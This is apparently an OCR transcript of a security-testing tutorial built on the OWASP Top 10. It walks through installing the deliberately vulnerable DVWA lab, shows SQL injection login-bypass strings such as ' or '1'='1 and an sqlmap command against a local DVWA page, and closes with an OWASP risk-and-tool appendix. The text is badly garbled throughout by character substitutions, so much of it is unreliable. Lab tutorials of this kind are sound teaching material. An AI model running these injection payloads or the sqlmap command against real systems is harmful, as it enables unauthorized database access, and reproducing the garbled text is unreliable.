Simply un?ip dv!a.?ip, place the un?ipped files in your public html folder, and then point yourbro!ser to http> $* .%.%.$ dv!a inde".php . Application !ill be accessible only on localenvironment, if you !ant to access it from other machine edit .htaccess file and change thissection Z Limit access to localhost

Z Limit access to localhost

Limit 7T &-ST &2T

order deny,allo!

deny from all

allo! from $* .%.%.$

Limit

to>

Z Limit access to localhost

Limit 7T &-ST &2T

order deny,allo!

allo! from all

Limit

Set database credentials in config config.inc.php

` '# AV Hdb userH W G Hyour database usernameHM 4in my case rootE6` '# AV Hdb pass!ordH W G Hyour database pass!ordHM 4in my case rootE6` '# AV Hdb databaseH W G Hdv!aHM

n '# A application username and pass!ord are stored in Ndv!aO database in the tablenamed NusersO.

SQL injection

Simply stated, S1L in/ection vulnerabilities are caused by soft!are applications that acceptdata from an untrusted source 4internet users6, fail to properly validate and saniti?e the data,and subse;uently use that data to dynamically construct an S1L ;uery to the databasebac8ing that application. <or e"ample, imagine a simple application that ta8es inputs of ausername and pass!ord. t may ultimately process this input in an S1L statement of theform string ;uery G P S7L7CT F <R-0 users @7R7 username G PHP username PH A '

pass!ord G HP pass!ord PH J

Since t'is query is constructed !y concatenating an in ut string directly from t'euser t'e query !e'a<es correctly only if ass ord does not contain a single-quote

#ersion $.% &rint 'ate $( )an *%$+ &age *( of %

http://www.apachefriends.org/en/xampp-windows.html

http://www.dvwa.co.uk/

http://hiderefer.com/?http://127.0.0.1/dvwa/index.php

http://www.apachefriends.org/en/xampp-windows.html

http://www.dvwa.co.uk/

http://hiderefer.com/?http://127.0.0.1/dvwa/index.php



c'aracter* If t'e user enters admin as t'e us ername and e"am le> %9 >a>,>a as t'e ass ord t'e resulting query !ecomes

S7L7CT F <R-0 users @7R7 username G HadminH A ' pass!ord G He"ampleH -R

HaHGHaHJThe P-R HaHGHaHPclause al ays e<aluates to true and t'e intended aut'entication c'ec&is

!y assed as a result*

The HidH variable is vulnerable to S1L in/ection.SELECT <irs" 4()e> (s" 4()e FROM -sers WHERE -ser i, = ' ?i, ' ;

So !hen attac8er inser id G $ in the input field N2ser 'O and submit that, application !ille"ecute follo!ing S1L ;uerry>SELECT <irs" 4()e> (s" 4()e FROM -sers WHERE -ser i, = ' 1 ' ;

nsert <o owi47 S8L s"ri47 i4"o i4#-" <ie ,$ ' or '('='( (4, #ress S-b)i"

After s-b)i""i47 S8L s"ri47 res- " is$

SQL Injection (Blind)

0anipulation of coo8ie data

Start - AS& DA& tool

o to the '# A login page and enter incorrect username and pass!ord

&ress Login button

ntercept @TT& re;uest

#ersion $.% &rint 'ate $( )an *%$+ &age *= of %



Start Bac8Trac8( and run s;lmap tool

Type follo!ing>

python . s;lmap.py 3u http> $%.$.$.++ dv!a vulnerabilities s;li blind IidG(KSubmitGSubmit

33coo8ie securityGlo!M &@&S7SS 'Gv8eb(vmgra$abb$ri ta% peb% 33level (- AS& DA& tool reports * alerts !ith @igh ris8 against S1L in/ection $




Appendix

The - AS& Top $% eb Application Security Ris8s(

, as of the *%$% list, are>• 1> )n*ection>

o n/ection fla!s, such as S1L, -S, and L'A& in/ection, occur !hen untrusteddata is sent to an interpreter as part of a command or ;uery. The attac8erEshostile data can tric8 the interpreter into e"ecuting unintended commands oraccessing unauthori?ed data.

• -> Cross#Site Scripting . SS

o 5SS fla!s occur !henever an application ta8es untrusted data and sends it toa !eb bro!ser !ithout proper validation and escaping. 5SS allo!s attac8ersto e"ecute scripts in the victimEs bro!ser !hich can hi/ac8 user sessions,deface !eb sites, or redirect the user to malicious sites.

• > 5ro4en ut"entication and Session Management

o Application functions related to authentication and session management areoften not implemented correctly, allo!ing attac8ers to compromise pass!ords,8eys, session to8ens, or e"ploit other implementation fla!s to assume otherusersE identities.

• 7> )nsecure Direct Ob*ect References

o A direct ob/ect reference occurs !hen a developer e"poses a reference to aninternal implementation ob/ect, such as a file, directory, or database 8ey.ithout an access control chec8 or other protection, attac8ers can manipulatethese references to access unauthori?ed data.

• 8> Cross#Site Re6uest 9orgery .CSR9 . 2&'AT7 + *$> e! in3depth article on CSR< here

o A CSR< attac8 forces a logged3on victimEs bro!ser to send a forged @TT&re;uest, including the victimEs session coo8ie and any other automaticallyincluded authentication information, to a vulnerable !eb application. Thisallo!s the attac8er to force the victimEs bro!ser to generate re;uests thevulnerable application thin8s are legitimate re;uests from the victim.

• :> Security Misconfiguration

o ood security re;uires having a secure configuration defined and deployedfor the application, frame!or8s, application server, !eb server, databaseserver, and platform. All these settings should be defined, implemented, andmaintained as many are not shipped !ith secure defaults. This includes8eeping all soft!are up to date, including all code libraries used by theapplication.

• ;> )nsecure Cryptograp"ic Storage

o 0any !eb applications do not properly protect sensitive data, such as creditcards, SS s, and authentication credentials, !ith appropriate encryption or

( Reference> http> resources.infosecinstitute.com o!asp3top3$%3tools3and3tactics

#ersion $.% &rint 'ate $( )an *%$+ &age *: of %

http://resources.infosecinstitute.com/owasp-top-10-tools-and-tactics/#injection

http://resources.infosecinstitute.com/owasp-top-10-tools-and-tactics/#xss

http://resources.infosecinstitute.com/owasp-top-10-tools-and-tactics/#broken

http://resources.infosecinstitute.com/owasp-top-10-tools-and-tactics/#dor

http://resources.infosecinstitute.com/owasp-top-10-tools-and-tactics/#crosssite

http://resources.infosecinstitute.com/owasp-csrf/

http://resources.infosecinstitute.com/owasp-top-10-tools-and-tactics/#misconfiguration

http://resources.infosecinstitute.com/owasp-top-10-tools-and-tactics/







http://resources.infosecinstitute.com/owasp-csrf/




hashing. Attac8ers may steal or modify such !ea8ly protected data to conductidentity theft, credit card fraud, or other crimes.

• <> 9ailure to Restrict ,RL ccess

o 0any !eb applications chec8 2RL access rights before rendering protectedlin8s and buttons. @o!ever, applications need to perform similar accesscontrol chec8s each time these pages are accessed, or attac8ers !ill be ableto forge 2RLs to access these hidden pages any!ay.

• => )nsufficient Transport Layer 'rotection

o Applications fre;uently fail to authenticate, encrypt, and protect theconfidentiality and integrity of sensitive net!or8 traffic. hen they do, theysometimes support !ea8 algorithms, use e"pired or invalid certificates, or donot use them correctly.

• 10> ,n?alidated Redirects and 9orwards

o eb applications fre;uently redirect and for!ard users to other pages and!ebsites, and use untrusted data to determine the destination pages. ithoutproper validation, attac8ers can redirect victims to phishing or mal!are sites,or use for!ards to access unauthori?ed pages.

<or nine of the - AS& Top $% !eb application security ris8s !ill suggest a tool to help youidentify and mitigate these ris8s !ithin your organi?ationEs !eb applications and services. !ill further endeavor to provide a uni;ue tool for each ris8 thus avoiding redundancy !hileproviding you !ith multiple options.

<ollo!ing is a ris8 and tool matri".

R S[ T--L

1> )n*ection S+L )n*ect Me

-> Cross#Site Scripting . SS @ ' A SS Me

> 5ro4en ut"entication and SessionManagement

$ac45ar A@ 'A &ebScarab

7> )nsecure Direct Ob*ect References 5urp A@ '

8> Cross#Site Re6uest 9orgery .CSR9 Tamper Data A'inata A&ebScarab

:> Security Misconfiguration &atobo

;> )nsecure Cryptograp"ic Storage B/

<> 9ailure to Restrict ,RL ccess Bi4to/&i4to

=> )nsufficient Transport Layer 'rotection Calomel A sslscan

10> ,n?alidated Redirects and 9orwards &atc"er

#ersion $.% &rint 'ate $( )an *%$+ &age *9 of %

http://resources.infosecinstitute.com/owasp-top-10-tools-and-tactics/#urlaccess

http://resources.infosecinstitute.com/owasp-top-10-tools-and-tactics/#TLP

http://resources.infosecinstitute.com/owasp-top-10-tools-and-tactics/#redirects


























7 5ibliograp"y

$. http> !!!.cgisecurity.com csrf3fa;.htmlZcsrfuses

*. https> !!!.o!asp.org inde".php 0ain &age

. http> ne!s.netcraft.com archives *%$* %9 $% minimum3rsa3public38ey3lengths3guidelines3or3rules.html

+. http> resources.infosecinstitute.com o!asp3top3$%3tools3and3tactics

(. http> yehg.net

=. http> !!!.securiteam.com securityrevie!s ('&% $& =7.html

http://www.cgisecurity.com/csrf-faq.html#csrfuses

https://www.owasp.org/index.php/Main_Page

http://news.netcraft.com/archives/2012/09/10/minimum-rsa-public-key-lengths-guidelines-or-rules.html



http://yehg.net/

http://yehg.net/



http://www.cgisecurity.com/csrf-faq.html#csrfuses

https://www.owasp.org/index.php/Main_Page




http://yehg.net/


Security Testing by OWASP Top 10

Documents

Transcript of Security Testing by OWASP Top 10